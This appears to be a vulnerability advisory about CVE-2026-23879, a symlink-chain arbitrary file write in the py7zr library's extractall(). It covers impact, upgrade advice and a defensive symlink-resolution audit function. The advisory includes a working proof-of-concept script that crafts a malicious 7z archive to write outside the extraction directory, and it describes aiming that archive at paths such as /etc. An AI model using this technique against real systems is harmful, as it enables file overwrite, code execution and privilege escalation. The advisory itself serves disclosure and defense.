CVE-2026-23879 is an arbitrary file write vulnerability discovered in the py7zr Python library, affecting version 1.1.0 and every release up to and including 1.1.2. The root cause is the library’s failure to properly validate and restrict the targets of symbolic links when extracting a 7z archive using the `extractall()` method. During extraction, the library checks each link’s arcname against the destination directory but does not resolve the full, combined path of a chain of symbolic links. This oversight allows an attacker to craft a malicious 7z archive containing a chain of symbolic links that ultimately points outside the intended extraction directory, for example to the system root directory. When a regular file is subsequently extracted through this chain, it is written to an attacker-chosen path, bypassing the directory boundary check. This can lead to severe consequences including remote code execution, privilege escalation, data corruption, or denial of service. The vulnerability is fixed in py7zr version 1.1.3.
DailyCVE Form
Platform: py7zr library
Version: <=1.1.2
Vulnerability: Arbitrary file write
Severity: High
Date: 2026-06-19
Prediction: Patch available (1.1.3)
What Undercode Say
Analysis of the vulnerability reveals a classic path traversal weakness, CWE-29: Path Traversal: ‘\..\filename’. The vulnerability is triggered during the extraction process, specifically within the `SevenZipFile.extractall()` method.
The following bash command can be used to check the installed version of py7zr, which is crucial for determining if a system is vulnerable:
pip show py7zr | grep Version
The following Python code demonstrates the vulnerable logic by creating a malicious archive and then extracting it, leading to arbitrary file write:
import os

import py7zr


def create_malicious_archive(output_dir: str):
    filename = "archive.7z"
    file_path = os.path.join(output_dir, filename)
    with py7zr.SevenZipFile(file_path, 'w') as archive:
        archive.writestr("Some Text", "dir0/someFile.txt")
        # Create a chain of symbolic links to traverse out of the target directory
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir1", "dir0/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir2", "dir1/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir3", "dir2/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir4", "dir3/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir5", "dir4/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir6", "dir5/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir7", "dir6/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir8", "dir7/..")
        archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "myTmp", "dir8/tmp")
        # Write a file that will be placed at the final symlink target
        archive.writestr("Malicious Text\n", "myTmp/poc.txt")


def extract_archive(seven_path, output_dir):
    os.makedirs(output_dir, exist_ok=True)
    with py7zr.SevenZipFile(seven_path, mode='r') as z:
        z.extractall(path=output_dir)
    print(f"Extracted '{seven_path}' to '{output_dir}'")


if __name__ == "__main__":
    create_malicious_archive(".")
    extract_archive("archive.7z", "extracted_output")
This script, when executed, will create an `archive.7z` file. Extracting it will create a symlink chain that points to /tmp, and the `poc.txt` file will be written to /tmp/poc.txt, demonstrating the arbitrary file write.
Exploit
An attacker can exploit this vulnerability by crafting a malicious 7z archive. The archive must contain a chain of symbolic links where each link points to a parent directory (e.g., `dir1` -> `dir0/..`, `dir2` -> `dir1/..`, etc.). The final link in the chain points to a sensitive directory on the target system, such as `/tmp` or `/etc`. The archive also contains a regular file that is written through this chain of symbolic links. When a victim extracts this archive using a vulnerable version of py7zr, the symbolic links are restored, and the regular file is written to the attacker-specified location outside the intended extraction directory. The exploit is reliable and does not require user interaction beyond extracting the malicious archive.
Protection
The primary protection against CVE-2026-23879 is to upgrade py7zr to a patched version. The vulnerability is fixed in py7zr version 1.1.3 and later. Users can upgrade using the following pip command:
pip install --upgrade py7zr
For environments where immediate upgrading is not possible, it is advised to avoid extracting 7z archives from untrusted sources. Additionally, system administrators can implement monitoring and detection rules to identify attempts to create or extract archives with suspicious symbolic link chains.
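The check the vulnerable `extractall()` lacked, as an added defensive example (not py7zr’s own code): before anything is written, each member’s arcname and each symlink’s target is resolved through every link already declared in the archive, component by component, and the archive is refused if any member would land outside the destination. It assumes the archive listing has already been read into (arcname, symlink target or None) tuples in archive order; the sample list is constructed here and mirrors the chain described in this write-up.

```python
import posixpath
from typing import Dict, List, Optional, Tuple

def resolve_in_archive(path: str, links: Dict[str, str], max_hops: int = 40) -> str:
    """Resolve `path` through every symlink seen so far; result is relative to the extraction dir ("" = the dir itself)."""
    parts = [p for p in path.split("/") if p]
    current, hops = ("/" if path.startswith("/") else ""), 0
    while parts:
        component = parts.pop(0)
        if component == ".":
            continue
        if component == "..":
            if current == "/":
                continue  # cannot climb above the filesystem root
            above = current == "" or posixpath.basename(current) == ".."
            current = posixpath.join(current, "..") if above else posixpath.dirname(current)
            continue
        candidate = posixpath.join(current, component)
        target = links.get(candidate)
        if target is None:
            current = candidate
            continue
        if (hops := hops + 1) > max_hops:
            raise ValueError(f"symlink loop or excessive chain while resolving {path!r}")
        parts = [p for p in target.split("/") if p] + parts  # splice the link target in, keep resolving
        current = "/" if posixpath.isabs(target) else posixpath.dirname(candidate)
    return current

def escapes_destination(resolved: str) -> bool:
    return posixpath.isabs(resolved) or resolved == ".." or resolved.startswith("../")

def audit_members(members: List[Tuple[str, Optional[str]]]) -> List[str]:
    """Return the arcnames (in archive order) that would land outside the extraction dir."""
    links: Dict[str, str] = {}
    offending: List[str] = []
    for name, target in members:
        bad = escapes_destination(resolve_in_archive(name, links))
        if target is not None:
            dest = target if posixpath.isabs(target) else posixpath.join(posixpath.dirname(name), target)
            bad = bad or escapes_destination(resolve_in_archive(dest, links))
            links[name] = target  # later members may be written through this link
        if bad:
            offending.append(name)
    return offending

# Constructed sample mirroring the symlink chain in the write-up above.
SAMPLE_MEMBERS = [("dir0/someFile.txt", None)] + [
    (f"dir{i}", f"dir{i - 1}/..") for i in range(1, 9)] + [("myTmp", "dir8/tmp"), ("myTmp/poc.txt", None)]
```

A lexical check such as `posixpath.normpath("dir1/..") == "."` passes every link in this chain, which is why each previously seen link has to be expanded rather than collapsed; `dir1` alone resolves back to the destination and is legitimately accepted, while `dir2` onward climb above it.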
Impact
Successful exploitation of this vulnerability allows an attacker to write arbitrary files to any location on the host file system that the extracting process has permissions to write. This can have several critical impacts:
Remote Code Execution (RCE): By writing a malicious file to a location like a web directory, startup folder, or cron job, an attacker can achieve code execution on the target system.
Privilege Escalation: Overwriting system binaries or configuration files can lead to privilege escalation.
Data Corruption or Loss: An attacker could overwrite critical system or application data, leading to data corruption or denial of service.
System Compromise: The ability to write arbitrary files is a fundamental step toward full system compromise.
Sources:
Reported By: github.com